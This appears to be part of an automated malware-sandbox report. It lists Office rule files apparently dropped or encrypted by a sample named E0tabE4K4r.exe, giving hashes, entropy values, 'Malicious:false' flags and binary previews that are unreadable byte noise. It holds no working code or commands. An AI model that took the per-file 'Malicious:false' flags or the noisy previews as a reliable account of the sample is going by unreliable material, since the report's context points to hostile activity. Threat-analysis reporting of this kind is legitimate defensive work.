                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1395
                                                                                                                                                  Entropy (8bit):7.853014570725306
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:tAqMBw7lG0w3VfNTQKkAiGV2hfxG+cie1/ZQkFT1cg+r2bD:tR7lG0oVfN8TtJxxm1/L1ND
                                                                                                                                                  MD5:540D88738FBFB717446FF066A6904102
                                                                                                                                                  SHA1:9CA07FE98084B1F2B643A5F75D4546E3F14E5162
                                                                                                                                                  SHA-256:7B8602DEC85F4BFCD725A0D3F6F850F15511AFD5F2774FF02DDFEF56DBB030D6
                                                                                                                                                  SHA-512:032F90E4428561C5AA8498B3F708331D942F8D997C8339B359111C37909F012E91AF869E31A52D60CBBACF4518FE85DE7427D2B3D464D31E921A78329B29564E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...-F$....P.o$.#...A.k.x|<.P..HD....N.&Z&i....+....u.......>.o.Z.../...l.k.v..:.. ..v$....=.7j.{...=.K..)\.G....8....ye+%qT.n.aE.Z......y.\.|...oJ8....U2...h....L.JT.....w{p..V}(7...1.>4...=.d.bB.....'r7..r.t...r...>..:..<.i...Da....B..:.;R..~b..E/.X....%...9H.0o...O.N...,.8.-.-.......+...~4.>..6Nz..a.h....'.z...t.4-e.....&.......^.-.....:.._.8......N.x;E..e*j&....aF.....Q..G...B._....G<....Ki...D.T..H..O}..(...<.....EH......q9.........7...F..-.l.Q....&B.L}......<?`.x~..2.j.T....I.L..-.+.rK...{.....S....`.,. o..+....J..e.......}..xJ.p.iZ..g.....X ...sn..S#Yp....d..C..NU../!6..!....C.O._..e.^+V......x...*....6&..i...A.Ah'.mB.n\.]...KV..J.._.Ysj;.V.......<.b..L....% .L.._.M..?...\p.E.fY.o($y.X.....=..J..(....y`.......!....`e0..9.2.T.....F...$...)L...cQr,.!..|.!.....v.*.=...Ys...I.'......I..A.%.%.z.[B.....ew..~$....#2....z.I...Lx.a.)........u..}..h......G.Y..N.......0.pQ.;...|.S..>..{...b....=.....N...hn.v.... .....?..H.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10818v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1124
                                                                                                                                                  Entropy (8bit):7.8059226483332695
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:sK0jcstEJhWpiPJ/oa2GV8RAyUTi++Air/Err8BPxI+uoT2bD:sKkcqEO4nPaLErr8BPxHnAD
                                                                                                                                                  MD5:A8977C33265754095BA5166E5CFD8295
                                                                                                                                                  SHA1:83AB2ECE0FA31DA35C44EB6CDD5D1671A873A5AE
                                                                                                                                                  SHA-256:B7962DC98E72330BE66594F816BF03F6DBBD5883ED5B102B4FB87CF033F35767
                                                                                                                                                  SHA-512:1CCB69D22708E129DA239F19542835B33BD53D6CF46871633FEDC41407F1B1B54937CC09F169FCDC2D33317C45509A0872B17ED24A5826A9661BD54A24856A31
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmln.S..........Y....[9..g.x.&ON.o...dx......:..^....O.~..%"...........:...\.Bz..)HZ)P%.H.RZL......n.OI...T..S.q.6..j.3.|_ta;.K06...k:.....x....;......\.k5$a(*/.Xg..t.%..zw...#6.^."b.?...r.c.w......@..!..9.r.1...P..I.*.[.....l...+.....T..B.._P.l.tpl|..?$.WZ.i{..~^.......*}..1P%..f.~.....=.1.....>G..II.R.....G....yl*.=<.7..Q.7H...R.aw...g.f.........L..Jw..2...EG#?Yh...........E.-.B.w....-*6..j+..l.._]6...r....a.. ....@]....2(s&~........(...+/s(1.}..T..|....O..X.)...)..#.~...|bx..7S.n..pq.Vr..W..[...c....`(.&J.'......g..|..a...ZK...B.Il:.....].0..zSwV..q.<aH`....OTB.is...k=5..jLGXH..6?..X...a...."a....l.tE?...N..A&...o.*..tL...4....[.~N%\i...L.P.k\.Q......;.9.$8_}}.....e..7.p..1.u%T.:..DOj.z..3...[.I.}.7-6A.....*..g...;.V..}(....hR...<..V.6ZT..)f..70ln2.G$Mk).T.....Y..)^.... ......-..a..R.Z.....E.q.....S.G[k.?..6..wxC...D...1]...eB.....#..%\!....5^:...GN..K...m._F...8...O.c.Ry.2~O.Rp..u.XWA^.C...V[Bl..U....0..?|e..P9..I..."...D.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10819v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8769
                                                                                                                                                  Entropy (8bit):7.978585656863234
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:0r8Xc/K80ZMAgZoJ57Eos/ytwff9PDSeR5fx50AGVIx3G5Lw:0X/GZMhoJ9E7owAWD0AGVCew
                                                                                                                                                  MD5:FDACF7AB5AD7B8B89BB70E197522C56B
                                                                                                                                                  SHA1:BF5761B9C102798ED637D1369C8544468D309C7A
                                                                                                                                                  SHA-256:70DA856DC0311B37A484C7595A0169DE65D473D4AC32FD83C7C846BDDAC39C90
                                                                                                                                                  SHA-512:5C9DEEF2601CC217C9B75E8AE22CF229A5B840CADB69342CF1E41608C7F4691FB92DFA3CF706819D7D66E7A063EB1BA099A9C28E30456F3824E6B7410802716F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.X........c.t.1.nqv.N.....V.W~l.d&.....t2.C.....1.......]r.ze.o...0..<h..A.0...}.....G.........y.&.....yc8....m.|.=.C.../}...-....Eo.B........4...e.....3.-...].A.h-.oV.....h...r5.H.o.^.....!....*R&,9..J."..&J&j..Ei..m.z.JJl......v.....Qzv.a..ka...g..p....e.......S.`<..T.N...u.....V]I.....o....T...q"`..M..q.h.T6%B.?.......b......*...4LqC.1.;=.. ..Dqy...E.A.{q..6+5B....tv6Ki.`..&2...^..2;H.....?d%.J.{.2.:.8.xl./....i.<..n.........v&3..A....<..*..C.*.,..Z....b[ T...0J*.d\.p.I..d.O...T...#.1.!..t.)6]..|..*...W>G..Z.6^.]..X......J..'.4.Fw....#...m...d!fv.k.........S^v...~.....M.}3*......z.........&Sl(&..s8.ji..i.@...X...6)b.....>....c.....&..W......0J.......wI.}r.3.|.o.,(....Z.n'.(.e..."..P$.<...=..H..C`...<.?......q.Hh.M.^:...C...#n..n....b1.y..T6x.IT...s..(.q.`. (.V.[C...k$..A....".6..Z..en-.\.*wv4E......(..J.5h|.4.b.../s.....8:.....fu......]I..R..Z.}.>.y0.G....l........>.b....w"..Vj.K.%.1.t\.. ......../..#.P5...."YW>...:.v.|....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10820v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):5842
                                                                                                                                                  Entropy (8bit):7.968365915178397
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:9SPLhuzncQY8Gy3LIJKXs//M5ltUA0FeBVA8FG6UM6WneW1wEkh0LzE0jEhRkW:9S9uzRGcMJn/elt0wBVA8F1U4eYPs0xa
                                                                                                                                                  MD5:68EFF25C4726F3E14A21DBB4CF9790AA
                                                                                                                                                  SHA1:A687F1F604DD3FA981C52A863D06B63ED4DA9B29
                                                                                                                                                  SHA-256:60F6A4DCD56FCC04715288F0310ED12A7A2313F0DF4CFC894A3A216849D0342A
                                                                                                                                                  SHA-512:C8847961B85CAC8C0DDE583FF213F14B36A8D31B55144278D0030831153B254F473EB5E5A45079AC4D575E47FF6073CF96A526830B19AD139E2E27064137DAA4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlCAo.>1..[.A.0...J.(.z.....d...{88A........z(....T!..6.....S...:..m.+.e..J..}O.z..C.q.... ..\..n.e...,^)@.S.=Nkm... .X.\.~5...N.&.~.@.S;v..t....A......#... z.i ~..&.JXb.x6.....!.b..D.....i.d.F....z...d.|Z...xx}.......!3..Ih.-..._.C....Kla.6#.....c)S........6U..w..(.q.7.....O.4{.0f.......-...N.O..!.8{EW.>.....n.C...'{...C2.E_.3S..-.t.$..<.... ...5\jR.~.l..$m ...?.n.#g.0........2!.bl.U.....3..[H.-U.[.P]....B.I..ahf...(4...N6.?72..{..2..0$=..x?..r.N..|.p...l.+;.....z..W.pzx.+......P....i....2..f.{.9.5.d.B!.o-:.....(....3....H..|".*...ilo.xv....f..(.............Z<}...Q...2........../..3..Ur1........B.Q..-Q...i#..t..[=*4.S.......a:.t{.JR.....Y.......IW.n.0.`........).Z...n.7=N.Mq.....i...Ut..].._...-....Y/#.]a.u)u.o'.~.@.k7\j..k..t..$...<..`..X;z*u....<W.....-.....Q...-.*..Y.....-.T.......8.r..:.P..\.C.*W^.u7t.....D..}......>.C..,.n..W.!t...`...U....-..b..>..{d.....Ag.3.$..Zrpb......<EaVmx..Ah..!.)..x..B(..T......N....Y._%i.!.Kb^.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10821v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4787
                                                                                                                                                  Entropy (8bit):7.95903987357687
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:10WQsHMIo9ys6fD3dMGo0r5mU7Lqw4Q/iVNMw9a76wusc:z8j9ys6fDaGTr5mUCMCNrU76wtc
                                                                                                                                                  MD5:89D36208E1063CDEAE19C0907B517D08
                                                                                                                                                  SHA1:64F53438BD107FD821BED03387081763EC08F868
                                                                                                                                                  SHA-256:62DA682770E810E89E022F48A5C45242D242429683A67F05D43A1509686EA5B6
                                                                                                                                                  SHA-512:9C0F6FAAA7F1ABB5C7EA6B08CF4447B9AF2645F95AE879D622D33B1E94CF12930F9B9E07C3DF38B9357F9A7EEDB7F4323ED77FF3F59155490D34DFBC0E6C846E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlE#P.*!.....{.=..R3.Z.....la?...,...&.*&m.."n2.4."k.9.E.V...=h.|.\.:.97]......q./;O}........A.+.FX6.p.U.5.|f.D..5./.....2~n#l....U.......F.....A-.._.i..^P\;.#.9*8_@.....O..^..-............k.....0m^.UB..=...S..!..=..Z>E"...|.X...C'~XcN.w.f.U...!....#0~...#.7.`!...v...G......4...(.........:..n..9...B6.N..o*.{>f<o([...~.N..F.#..<.E..U.*aQ.O.".N.2.J..G.q.S..+.Y......X.....|7*G.M.U....]=z...KR.0!..1%..O}3..kIR....Z....A.\..a...;..jn......"..&.p.}`....5*oF..?...}..9%.qs7...i.............,..gi3)...vV.z..##.q_...s.........;O.`..Z.jc`...DT.y.h:..*.Zb..FZ..0.J(.Y..p.G.Z..[O..;^QfAU..q.....A...Q_..^y&..K..ZZ`ZA...2.L....I"...'\..{.P...j.O.`^g......Lr.2..c}:...7..fko.1...hC:....T..%s.).q..g...1]........)..;.h.t(..i.Z.2....................F.._.l....R(......r.{2;.....z.JNt.....d...@y...s|...Q5F....m.Vo.....,k..G%.G...4..{.../.p|k.X.LG......@.`...........nzz.......lf.~.b...........D..%....1.].m.w.y....P.h..o.K......3.,.*EG.g..#;.d...N4..7..;..|....v..Iw.).

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10822v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4786
                                                                                                                                                  Entropy (8bit):7.964441114793204
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:CLemsO3SQEqznm2c32mBY7P/Q8XUNT2j0uFrMJCg48RWtks6UILALVkrqrrJ:CN338whXP/+2rgS5tkxUILIVXr1
                                                                                                                                                  MD5:67F97CC31AB62EF13746CA1A8CCE3553
                                                                                                                                                  SHA1:170338590D1D3A14BBB6079B8C3F31EA74E070BD
                                                                                                                                                  SHA-256:0DFF9FA2F86A6C75B9F090068A32F5C568AA1BBA7ABAA0366AA0DE91FDFF3E3B
                                                                                                                                                  SHA-512:D559C683FE58A4C75F2F1E1CE0A26228449E383B7556B2FA9CDBF62C5B36A05CB0692A5613C6C8700873400BCA8E1C089E273E40444406C89FADF8F95C122EC5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.=.S.#..n./....m....+.|^zOM.E.L....t...ZYi..R.b..rL../i3e..o..*2..-..7g.|"H...v.....1(Fj.D.E.j.n.......g.]BN...._.$.....d.}q..s.S63?.eK.I?.z|hN.[5...R.re....Ht...........8.c...fm...`.....y.;.wMC.uu.(2......}...99M...H...`i].. . .`..9{i.Cd.l.;...c..c.."..t.*x..yNL...zD,](..@........y.:..X"..2.u...7.1...G...}.. ....aQ....RN..R.gD."E.tWe&.8....lt.i...g..;..K.".c.5.@..Ae..F.oo..B..:.k....A#oE#.o.y.^PX.W...c.M....n. .qZ....B]..............\...o.:.X.....X.....4...g..X.C.../.Mp.*..tCj..r.l.V,.}......V..,....6'-..)....;...>.Q..b..&h[..%y.gF...-..T...W.(..z...(..=.........pYce...Y..=.I=.+..#.?eL.EY.o...C..FG.V-X.....'.N.zu.*....j8......D....VAw..\...^....[...l.\o..i...K.B....A...J....\p.g.-....r|=..7.xi.....k.n..*...8......\.x.k..`.[..?.69<V...._\.]....h!..S..Ie...qh......}.MQP-...:.....%.....(.78(.t.....j).F.Y...8.=2..L....~.ZL'7..tR...I;T...t......_&.....{./.$.B......Xk.yI6y..O..fq..RkIU.Dc...|V..W.....V...I.t.<.0.ny.W.a.....'..U...P..A.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10829v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3030
                                                                                                                                                  Entropy (8bit):7.93724416384724
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:o1LunSzrgA+Eco4cFHhS1IvUFuhFemeijNoF0YmXYNERwGx2mGOWmrXkkPIWOLdY:OKSoAVHhFcFuvJBoPmXY60vOTroWs5SP
                                                                                                                                                  MD5:7E3C69B7292411ED2F03F4941E260BF2
                                                                                                                                                  SHA1:AE3EB44B321503458EEF11F00D606F938C86EB5F
                                                                                                                                                  SHA-256:8EB372927D02AEFF1F7E04FC8177220F1190A6BEDA4CF42A0F6F64C64B67D869
                                                                                                                                                  SHA-512:F593BFE648B989BDB68124BE0D20253B3BA388E6092529AF7A6900F9F1CAFB8867B8F76D4E78BB5CC10625716F50AC2A6C464137DD1D38FDDA045B51AA6C3267
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..e;......71.&"r@.v4..5C..4<T(.......=.yc.B%.M/g.>),D.....]A.xM.W+x...._...._...3_T..J.NX..........4....@^..y..q......{./.e%..,n.7A..?f..01.]L.E...='....m.v........k.]CQ6l........Rzq.:.S.O.T. K...)..M..W..P@S.H^%1..qvg.(.i.H..2..+........&zl..v../.-n.O..\.3.X.".8....#z...>...^..zI.Q.T..-a?.n@.!......z..p.~M(..d@....^..\.Bx%....gd.=.K...........7...^4i..U.b..`..V..1I.l_.3.....yB...o....?...-....V.Q..L......<..U....].o......5...9S.....a.....E5.Uh...V.Q.xv5......8.R..{A..7...._.L.|A.=.^{.q#g&...J;@.......EZI...O@....o....z...m.x.....sy...:..._-./. ..euuM.6c...,..C.v...t.gO.-..Y.5?;....NA ... .(."....F..{.Y=a_...U>H.....(^....*..:8..B~8.&HGp.....-...<h........GVu7....>W...:.<.U....V.Ti.*8.....N..D5(......../...&V..[..a&..E..;~_....]..."..n..D.....s.p.K.~..z.3;.......q.v...[..T.%..b...^b.R..dl3{.U.6...;..7..5J..n2.o.|v..........c.H....(.....F`...K.8nB._.X.^I.0."..?.R.sw9r.....A.....\.0.y=.w....4zU...W.... r.usok... ......{.ojq....{..M^..f.....}\H

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10879v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):789
                                                                                                                                                  Entropy (8bit):7.696317110148084
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:FfskAyK6J1APQjBmwd0gFO9wa01m9ioIHGjVJM7tuWT3t3Dfyk/iDSUdNcii9a:FDuQFmibO9d0Y9ioXjM7tVjySiO2bD
                                                                                                                                                  MD5:5E1D9F2086956A115F9C59D239FA9B09
                                                                                                                                                  SHA1:46CCCA1E10252EE901AE1F7A7D29C0FDE064C8B0
                                                                                                                                                  SHA-256:50085F8A3376B6761DDD4D89242FA01DFAABC9E0212F19C4D536E7CE0DC6565B
                                                                                                                                                  SHA-512:9449AF2B8C4CBEFCC48A52BCE8E9910EA5D987F3B0D819C23D79779CDD10793DAB81C649E6449D2CCEADDE6A7EE5EC61A34411216A9440185EE5A88FA1D94AC4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..\UKY._..wy28y..oIXE...O....pC.. .k..M...V....R...#.u,.).fe.....{n..P{&....n.fl.D....nDs.;R.iWX_.v.{....8&..@........9n.0.....p...L.j..-.v|S..*.,T?...R..'..+.ylD...;wm..%.[k....f.>R..&...w.......Kl.sm.5PCjl..%.oR4w'...i....".|...fE...w.A.#.........-....8[9...Y...z..f.T...X....\.G.%...}H..[P...kX......c..O..Wm0..U....R..].h.8.}gS.R8.q-.....x.ci.O.j.....}.b..:d..dO....N... .....PW.8.e.gn..9..+5'......GD,...83z.m.W.P..(.;, ...h2V2L...8.CE...P...^..k......M..i..t...+x@%...G....M_.......Sx]+.i...!..I..)C.< .Q?...._."...ac.$z.~BY...c.b.0>.q..A....s......f...d.|...U.... ".h%.....S).8.7a|..\.x.j..-h..Z(].-.W.....Xf:.Z.h...aF~.{....$Z.'.[sD.5.D]..{.`L.=.....;$.I..y:".L.W.u...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10880v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3017
                                                                                                                                                  Entropy (8bit):7.935849352696534
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:37infCZfDztRlRq9SjC74HenG5mPfRjAvoezsTgdRftdeuTpp3qkc6++NtLytmD:3efaDnB04HiR8voeSgdRfTDQkl++bLyE
                                                                                                                                                  MD5:7EC0B7B9CDF6E00F3BB0BBBD7222ECC2
                                                                                                                                                  SHA1:B6AF317D4D16EE17185274A846FBDEF171A4C10A
                                                                                                                                                  SHA-256:30515A069656DDA80789FBCFEB52E5470E396C88791F7840EF6C38FA2264545D
                                                                                                                                                  SHA-512:D5266D1325D3B7FF7ED58CE964035323531C57CF823B10283EF1D63E80D4914B8F0D1D616E803901E87B27516ABBE12EFDA0BF998B55B7222D25FDE6E6CC6859
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlO).....%T.F..V.My.@.k...i.7q....+J.=..^=._[.KiQ...r.S....jZ..r...T...P.2u.;....St...KVAw.f.........F.....S;I.|.&..V..@..t?....z|...;4...}A.....*..pm`q...EM.E...:.....U....`.L..@.&..kdIj..9r..3.9...E..h)..$..f.j.....@.JE...].....F.|....r..j.0....o..-.!...wk.?..E.O`.u....9;..gtMJ.M$F`P.oH..jy.9.T.......Zc....`...E......T...s....b..0..Q..0....8..!...K.S...f?..W..:.q..%[........P..W..R..,....T./..f%@.IS^8...HBL.....1.}....>.~..L|D.....^2[........VG..SP.i..;/..`~}.<.&6.J...........).G.$.x....O.._tN.|........v.k...*..........F............qI.o..-....0Qr`6..:e.:5...B..~q}......:._..t.ZBp=..2.[......o=...B.....T.).....%k.K...=......}-.g..G.....%.]`.{...<..$.7,.j..U.%g....'|....{....:X..$..&.."g.u....M.0.7..AX"e....\".t.p...?....&...R..(.'.{.J..\.)..}L.x.h.y.....$....y,rc.f~....3k&v.YtY...?..;.>\6..F3.\:....ST.......`S%.U.u...En2B.....?.@..G.MUEr..7LLR=...wZ.t..f.Ho..P.#..H...:...?..Y.YA.Y.Ad....u......nI.K.^F.3.I.Ce.W.IfE............

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10881v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):823
                                                                                                                                                  Entropy (8bit):7.792850869335584
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kb9/Vy0TwVJCL2r1zZa8gCxYA4sqJ1YH1IOfFukMQL5V48yOkpvk2DRWSUdNciik:yY0kqL2r1Va8JWsQOttMQXkW2DRV2bD
                                                                                                                                                  MD5:866EBE91F7764ED525102868E1165578
                                                                                                                                                  SHA1:814048E7F8FAD1800BA01C8AC9BCED04935E99D6
                                                                                                                                                  SHA-256:CB130068E326D6D409DEAD11B04524E66A8CFA95B357A154B47EC4E365BF35A0
                                                                                                                                                  SHA-512:1F0B7E49796057A125EA13F04608833F0465C89D8CF77B0FA92DFB18E8CAB9AE0AD4696A09B1F9DDB299649D81F8645E1C09052CC81D78D2DCCC2636B75CF655
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlY~..R..2....p>.1..``.'~..<..$[R......0.SC.-.;u..rH.s.U...Lw.u.l+.....^.].2H......m;cgu..S._/.\.z>..kF?Vt... e..W..n*..V.<.....>A..{e.......D.V.)....p.....W..Y/......A|=.&.q:.zL..e......y1..........["..Q..U....uP......e .....(mz.I.J..<...M...a..^w$..@j.!d....y...q....}DR..D..\.........k..9.....v..*.t..&6.[.Y6..;..*....>...%...Y.../f..Tf..N5..'......JQ@. ....$.]}...N.s.{..L.....w...~...=..h..(2...s$..a.y..(g+b.U...y......5N.[..0....-..[V.'.w.p?..c.$...!4.......l...VbQ>,.5<......`y.#...#..B_5t....m..[.EQ.a...^.d..=....n.....Cc%9..<;v.4....;.N...'...f.....N.&`..`.J..Z..X^.ib.......V.8.C.] }........W.I..I...p.wo....$X..*!%....2.. ....Y...c.....j.Z.v.w.ak.".Gi..,..-^...b?...w...#.*k.i7T...E.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10882v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3017
                                                                                                                                                  Entropy (8bit):7.940261638650659
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:vzWy79usS+e7lxDkvPC8g2xT8qLeA+XvpK/6MpSxoySC+rfw97sTLWvSJqrTk9UH:rWRsS+epxDYC8g2xT82eA+XRK/6/SCTr
                                                                                                                                                  MD5:FCC1A62B11040063CE92823A8065C9F8
                                                                                                                                                  SHA1:E2B2871566619803DD0833481AA91783B14BA76A
                                                                                                                                                  SHA-256:FD39866E00A864619F15EBA1C01FDEB803311776F2FD3835D87E3F4BA14B05AF
                                                                                                                                                  SHA-512:4ADAA953A83F37CACD15E513A1F4EE38865EEA6C01BF874681C925E04637D24EEC987CF27A9ED8317E07F98BEA517C5A14A774AB94031719171399FE5FF3142E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...e....V.=8..O...L....{jJ..#3].......09..).O.:vy.F..a.;.j...#...5..tMC....&M.uF^ #.'.cN].........a.x..r~|.K..w..Vv..O`.X?......G..o..D...On.....\^...(..J*Nz..)..K...8...C..^.n=f..^.y.g.B...o..H..w../X+.Nn}....2I.@R.eYi>3/....^.-^[s....^...W6...O....dv.~$y../%...0...cpq..a.M.....L..!..G_.t..9.g\+.B..r....H).. }.......P..^....kq......Fr..t..4.&..:".M..rePt.RpQ....9...>..=..s...:...T.l#k...i....E...z..P.....k.GX.F...~[M;Pon...P...Q.V..xR.3. ..$....P,T..g.*B...^8......*.T2,.0.._.bK....w,.e...#*..6...~.%x.G.......j..MC.r*}.w...8d{a..Om..)...!5..SD...d..E.}~..2.O.e..W..a.Y..{+].4....^...+.OjZ.+....U..j..w.*g..../....z.N.2.8^...-.$.~......<e.e.I...j`.E.Mx....:..w.J...]....0......14+9z.....A[...f......UjCRz...78...B......@...tR...3..>......}.{j]N.0+*......../.01p?$.....Q....;.y.&^,..p.q..K...fi......|.".J.A..n....C[.OfN+.r.a....h[.JU ..{q.E... ..L.......8..@....~(...mi..5._....xJ).q....;.f?.-...(.@..Jn....1Y.j...O.........7;Z.3..*KY.*.$...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10902v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1021
                                                                                                                                                  Entropy (8bit):7.787813626103068
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:1SeVDi/j3ZWfE7gbb9B5cuBMkblAdCyohIFSp8GWv7wwx+BLBcYEOY2bD:13D6baE7gnnl+dCy4IF9GWvE0oLB5lD
                                                                                                                                                  MD5:A62AFCB42F0514D1F9B2B1968401B045
                                                                                                                                                  SHA1:569301D73B480169639B6B7CC8625EBD42A9348E
                                                                                                                                                  SHA-256:47BF4C39F1C81EC44A5EB1888DC6EE441084EC01FFABFF452070CBAF5DA0362F
                                                                                                                                                  SHA-512:0D75C207E9182FA2969E7AC8F6366613A9F72517D6D4659DF3C0E9CF3BBBF8AF08BD79311E86E3ADBA80A696ADB6CCA18881AF1FFB8FA5BA9F30EDB92B62BEBA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...g&.xZw...)..At..y...0.UW.U.nL..C.(."...Oz[..'osj....6p.."....u.:d..U..&./..v..=...F.:>.Sc.h..c...E....SI...$!MSS.|.]..oYj%.L....T3..W.dF.(.>.D...c..f.....m.6.n....a...^Ef.z\...BS._<.%x...Z..%.L..p.CF.I.gf. ..ez.....m.P(.S...s.......q....1.#...._.5U.w~..Yq..($..I.....0B.......u.Bg...Q.,.]...e.9^......d.?..y.+.....P<.S...9m}.,}......9.9..._...S......(...a.2f{....M3x...,p..T.U3V.....6.....w...!e..@m.....Yt..*....=....dA...T("~UD=.g.....2i...].n[..lS..%y...9C..hE.A....xsMJ$..+}a....v........A....(....@..W.rG..(z.."N5.3.....M.....k....:..AT.q....m.#....=....8.7.J.C#.V... 8.-Vw3....._.g|~.g....7..W.!..4A..VgZz-...H.P...T......CF..S.Q.N.$-.....{....$$.....#.$./^.^I....j....t...Q..h...2}P.MS.H.02A.p:.K.Y.%..B.K...Hw......W......O....W/..~m_"8s..b...F..:>.rP.|.$..4....Z....R.sX.)...f...,..O..a.y.X..J.P.05*.l.@...q.#.nmRCrh8........F.(..V...z.vn..=......d..H.....&......*.....2...Y.....3~...8k6d.p.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10906v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1398
                                                                                                                                                  Entropy (8bit):7.856728565434045
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Sr/KQAfKlF8vT3xAcUjxeLpH5VGMP2Qq6e0rMMy9lBOAE9MuIvCrfUinq+2bD:Sr/Pgy87OdjcLpgQfoMybUvM0qlD
                                                                                                                                                  MD5:10941FE2CB6C255C99D05719BD8B3A99
                                                                                                                                                  SHA1:C9F1B1A8E83C29DA5941FF9ABCAF2775E0874315
                                                                                                                                                  SHA-256:042BCB63AFBB1CB8D649560FF344BC874353882ED341D05EFF2824BA3E8558F7
                                                                                                                                                  SHA-512:18FE2A49B41F8CB0B1B80EAFB3C1522076DA30DA285E6F2B32CB51C300E84824627EEFB31396889CC9CC165E0ABD74254C415110240DAB793D45CBF55EBA8B4F
                                                                                                                                                  Malicious:false
